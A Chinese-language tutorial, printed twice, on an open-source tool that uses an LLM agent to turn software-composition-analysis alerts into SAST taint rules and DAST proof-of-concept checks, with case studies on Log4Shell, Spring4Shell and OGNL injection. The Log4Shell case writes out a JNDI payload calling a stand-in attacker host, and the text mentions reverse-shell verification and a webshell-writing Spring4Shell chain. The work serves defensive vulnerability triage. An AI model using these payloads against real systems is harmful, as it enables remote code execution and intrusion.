SCA的“最后一公里”：基于LLM Agent联动SAST/DAST的漏洞可达性分析实践

字数 2841 2025-11-07 08:41:54

SCA的“最后一公里”：基于LLM Agent联动SAST/DAST的漏洞可达性分析实践教学文档

1. 背景与问题分析

1.1 传统SCA工具的局限性

软件供应链安全（SCA）工具当前面临的核心困境：

广度有余，深度不足：只能识别应用中使用的组件及版本，关联漏洞库显示CVE编号和描述
无法判断漏洞真实存在性：缺乏对漏洞是否真正可被利用的验证能力
修复优先级混乱：所有CVE一视同仁，缺乏业务场景下的风险评估

1.2 三大核心痛点

误报率高：仅基于版本匹配，无法判断代码路径是否可达
优先级混乱：缺乏基于业务场景的风险评估机制
修复盲目：开发团队不知道优先修复哪些漏洞，往往采用一刀切升级策略

2. 解决方案设计思路

2.1 核心创新点

通过LLM Agent技术联动SDL工具链中的SAST（白盒扫描）和DAST（黑盒扫描）工具，实现漏洞可达性验证。

2.2 SCA + SAST 联动方案（白盒验证）

第一步：SCA告警识别

扫描项目，识别存在漏洞的组件（如：log4j-core-2.14.1.jar）
从漏洞库获取具体的漏洞信息：
- 漏洞类：org.apache.logging.log4j.core.lookup.JndiLookup
- 漏洞方法：lookup方法
- 漏洞类型：RCE漏洞（Log4Shell）

第二步：SAST污点分析验证

SAST工具启动污点分析
Sink点设置：使用SCA提供的漏洞信息作为分析目标
分析逻辑：验证是否存在从用户输入到漏洞方法的可达路径
关键优势：直接验证代码层面的漏洞可利用性

2.3 SCA + DAST 联动方案（POC验证）

第一步：SCA漏洞发现

识别存在漏洞的组件和具体漏洞信息

第二步：针对性POC生成

基于漏洞信息生成专门的攻击Payload
示例：针对Log4Shell漏洞，生成${jndi:ldap://...}格式的Payload

第三步：DAST精准验证

不再是盲目全站扫描
在HTTP头、参数等位置插入针对性Payload
通过DNSLog或反向Shell验证漏洞是否真实存在

3. 技术实现架构

3.1 整体架构设计

基于LangGraph的Agent架构，实现多步骤推理和信息编排：

输入层

使用OpenSCA工具进行组件扫描
接入玄镜官方漏洞库获取详细信息

核心处理层

LLM Agent：基于DeepSeek-chat API
状态机设计：支持自主调用工具、循环查询、智能决策
信息编排：综合分析多个数据源的信息

3.2 信息获取与分析源

主要数据源

GitHub Security Advisories：及时性好，质量高
厂商安全公告：权威性强，修复建议详细
GitHub提交分析：通过修复commit理解漏洞本质
PoC源：提供实际的攻击向量

信息处理流程

理解SCA告警信息
查询多个异构数据源
综合分析所有信息（包括PoC代码和commit diff）
推导出SAST/DAST的验证规则

4. 实践部署与测试

4.1 测试环境搭建

测试项目

项目名称：starsea-mall
技术栈：SpringBoot + Thymeleaf的电商商城项目
源码地址：https://github.com/StarSea99/starsea-mall

工具配置

LLM API：DeepSeek-chat
框架：LangGraph + LangSmith生态
SCA工具：OpenSCA（https://github.com/XmirrorSecurity/OpenSCA-cli）

4.2 输出结果格式

主要输出文件

Enhanced Findings.json
- 包含原SCA输出
- 每个漏洞组件的SAST验证建议
- 每个漏洞组件的DAST验证建议
Processing Summary
- 任务总览信息
- 处理统计数据和性能指标

4.3 典型用例分析

DAST验证案例1：Log4Shell漏洞

输入：log4j-core漏洞信息
输出：

攻击方法：HTTP请求注入
具体API：所有接收用户输入的接口
参数名：所有HTTP头、参数位置
Payload：${jndi:ldap://attacker.com/exp}
成功判定：DNS查询日志或反向连接

DAST验证案例2：Spring4Shell漏洞（CVE-2022-22965）

输出特征：

精准识别漏洞利用链
利用class.module.classLoader...属性链修改Tomcat日志配置
提供写入webshell的具体payload
完整的攻击向量描述

SAST验证案例：Ognl表达式注入

输出特征：

识别汇点（Sink）：OgnlCache.getValue和TextSqlNode.apply
构建完整数据流模式：从HttpServletRequest（Source）到危险函数（Sink）
SAST工具可直接使用的扫描模式

5. 技术优势与创新点

5.1 多工具协同优势

信息互补：SCA提供组件信息，SAST提供代码路径分析，DAST提供运行时验证
减少误报：通过多层验证确保漏洞的真实存在性
精准修复：提供具体的修复优先级和建议

5.2 LLM Agent的核心价值

复杂工作流处理：传统单一Prompt难以完成的复杂推理任务
智能信息整合：自动从多个数据源提取、分析、整合信息
自适应学习：通过LangGraph状态机实现智能决策循环

6. 部署与使用指南

6.1 环境要求

Python运行环境
LLM API密钥（DeepSeek-chat）
GitHub Token（用于访问安全公告）
OpenSCA配置

6.2 运行命令

python cli/agent/main.py process -i output.json -t opensca

6.3 项目资源

开源地址：https://github.com/P4nY0O/SCA-enhancer
技术支持：通过Issue和Pull Request交流贡献
联系方式：微信号与GitHub同名

7. 未来发展方向

7.1 短期优化

适配更多SCA工具的输入格式
优化输出格式以便自动集成到SAST/DAST工具
增加更多漏洞数据源支持

7.2 长期规划

实现自动补丁分析（Patch Diffing）
探索代码自动审计能力
扩展支持更多的编程语言和框架

8. 总结

本教学文档详细介绍了基于LLM Agent的SCA增强方案，该方案通过智能联动SAST和DAST工具，有效解决了传统SCA工具的"最后一公里"问题。关键技术突破在于利用LangGraph框架实现复杂工作流的自动化处理，通过多源信息整合和智能推理，为漏洞验证提供了切实可行的解决方案。

该方案已通过实际项目测试验证，证明在降低误报率、明确修复优先级、提高漏洞验证准确性方面具有显著效果，为软件供应链安全提供了新的技术思路和实践路径。

SCA的“最后一公里”：基于LLM Agent联动SAST/DAST的漏洞可达性分析实践教学文档 1. 背景与问题分析 1.1 传统SCA工具的局限性软件供应链安全（SCA）工具当前面临的核心困境：广度有余，深度不足：只能识别应用中使用的组件及版本，关联漏洞库显示CVE编号和描述无法判断漏洞真实存在性：缺乏对漏洞是否真正可被利用的验证能力修复优先级混乱：所有CVE一视同仁，缺乏业务场景下的风险评估 1.2 三大核心痛点误报率高：仅基于版本匹配，无法判断代码路径是否可达优先级混乱：缺乏基于业务场景的风险评估机制修复盲目：开发团队不知道优先修复哪些漏洞，往往采用一刀切升级策略 2. 解决方案设计思路 2.1 核心创新点通过LLM Agent技术联动SDL工具链中的SAST（白盒扫描）和DAST（黑盒扫描）工具，实现漏洞可达性验证。 2.2 SCA + SAST 联动方案（白盒验证）第一步：SCA告警识别扫描项目，识别存在漏洞的组件（如：log4j-core-2.14.1.jar）从漏洞库获取具体的漏洞信息：漏洞类： org.apache.logging.log4j.core.lookup.JndiLookup 漏洞方法： lookup 方法漏洞类型：RCE漏洞（Log4Shell）第二步：SAST污点分析验证 SAST工具启动污点分析 Sink点设置：使用SCA提供的漏洞信息作为分析目标分析逻辑：验证是否存在从用户输入到漏洞方法的可达路径关键优势：直接验证代码层面的漏洞可利用性 2.3 SCA + DAST 联动方案（POC验证）第一步：SCA漏洞发现识别存在漏洞的组件和具体漏洞信息第二步：针对性POC生成基于漏洞信息生成专门的攻击Payload 示例：针对Log4Shell漏洞，生成 ${jndi:ldap://...} 格式的Payload 第三步：DAST精准验证不再是盲目全站扫描在HTTP头、参数等位置插入针对性Payload 通过DNSLog或反向Shell验证漏洞是否真实存在 3. 技术实现架构 3.1 整体架构设计基于LangGraph的Agent架构，实现多步骤推理和信息编排：输入层使用OpenSCA工具进行组件扫描接入玄镜官方漏洞库获取详细信息核心处理层 LLM Agent ：基于DeepSeek-chat API 状态机设计：支持自主调用工具、循环查询、智能决策信息编排：综合分析多个数据源的信息 3.2 信息获取与分析源主要数据源 GitHub Security Advisories ：及时性好，质量高厂商安全公告：权威性强，修复建议详细 GitHub提交分析：通过修复commit理解漏洞本质 PoC源：提供实际的攻击向量信息处理流程理解SCA告警信息查询多个异构数据源综合分析所有信息（包括PoC代码和commit diff）推导出SAST/DAST的验证规则 4. 实践部署与测试 4.1 测试环境搭建测试项目项目名称：starsea-mall 技术栈：SpringBoot + Thymeleaf的电商商城项目源码地址：https://github.com/StarSea99/starsea-mall 工具配置 LLM API ：DeepSeek-chat 框架：LangGraph + LangSmith生态 SCA工具：OpenSCA（https://github.com/XmirrorSecurity/OpenSCA-cli） 4.2 输出结果格式主要输出文件 Enhanced Findings.json 包含原SCA输出每个漏洞组件的SAST验证建议每个漏洞组件的DAST验证建议 Processing Summary 任务总览信息处理统计数据和性能指标 4.3 典型用例分析 DAST验证案例1：Log4Shell漏洞输入：log4j-core漏洞信息输出：攻击方法：HTTP请求注入具体API：所有接收用户输入的接口参数名：所有HTTP头、参数位置 Payload： ${jndi:ldap://attacker.com/exp} 成功判定：DNS查询日志或反向连接 DAST验证案例2：Spring4Shell漏洞（CVE-2022-22965）输出特征：精准识别漏洞利用链利用 class.module.classLoader... 属性链修改Tomcat日志配置提供写入webshell的具体payload 完整的攻击向量描述 SAST验证案例：Ognl表达式注入输出特征：识别汇点（Sink）： OgnlCache.getValue 和 TextSqlNode.apply 构建完整数据流模式：从 HttpServletRequest （Source）到危险函数（Sink） SAST工具可直接使用的扫描模式 5. 技术优势与创新点 5.1 多工具协同优势信息互补：SCA提供组件信息，SAST提供代码路径分析，DAST提供运行时验证减少误报：通过多层验证确保漏洞的真实存在性精准修复：提供具体的修复优先级和建议 5.2 LLM Agent的核心价值复杂工作流处理：传统单一Prompt难以完成的复杂推理任务智能信息整合：自动从多个数据源提取、分析、整合信息自适应学习：通过LangGraph状态机实现智能决策循环 6. 部署与使用指南 6.1 环境要求 Python运行环境 LLM API密钥（DeepSeek-chat） GitHub Token（用于访问安全公告） OpenSCA配置 6.2 运行命令 6.3 项目资源开源地址：https://github.com/P4nY0O/SCA-enhancer 技术支持：通过Issue和Pull Request交流贡献联系方式：微信号与GitHub同名 7. 未来发展方向 7.1 短期优化适配更多SCA工具的输入格式优化输出格式以便自动集成到SAST/DAST工具增加更多漏洞数据源支持 7.2 长期规划实现自动补丁分析（Patch Diffing）探索代码自动审计能力扩展支持更多的编程语言和框架 8. 总结本教学文档详细介绍了基于LLM Agent的SCA增强方案，该方案通过智能联动SAST和DAST工具，有效解决了传统SCA工具的"最后一公里"问题。关键技术突破在于利用LangGraph框架实现复杂工作流的自动化处理，通过多源信息整合和智能推理，为漏洞验证提供了切实可行的解决方案。该方案已通过实际项目测试验证，证明在降低误报率、明确修复优先级、提高漏洞验证准确性方面具有显著效果，为软件供应链安全提供了新的技术思路和实践路径。